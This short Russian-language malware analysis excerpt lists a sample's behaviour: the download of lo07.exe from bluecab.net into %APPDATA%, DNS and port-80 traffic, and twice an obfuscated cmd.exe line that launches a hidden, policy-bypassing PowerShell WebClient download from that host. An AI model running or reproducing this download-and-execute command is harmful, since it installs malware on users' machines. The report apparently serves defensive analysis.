Техническая информация
- http://bluecab.net/lo07.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OWER^shelL^.^exe ^-e^XE^cUT^I^onPolIC^y^ BYpaSs -^no^pR^OfI^LE -wiN^Do^w^S^t^yle^ HI^DdEn (neW^-^O^bj^Ec^T S^Y^S^tEM^.Ne^T^.we^bCl^i^ENT)^.do^WnLOAdFIl^e('http://bluecab.n...
- %APPDATA%.exe
- 'bl##cab.net':80
- http://bl##cab.net/lo07.exe
- DNS ASK bl##cab.net
- '<SYSTEM32>\cmd.exe' /c "P^OWER^shelL^.^exe ^-e^XE^cUT^I^onPolIC^y^ BYpaSs -^no^pR^OfI^LE -wiN^Do^w^S^t^yle^ HI^DdEn (neW^-^O^bj^Ec^T S^Y^S^tEM^.Ne^T^.we^bCl^i^ENT)^.do^WnLOAdFIl^e('http://bluecab.n...' (со скрытым окном)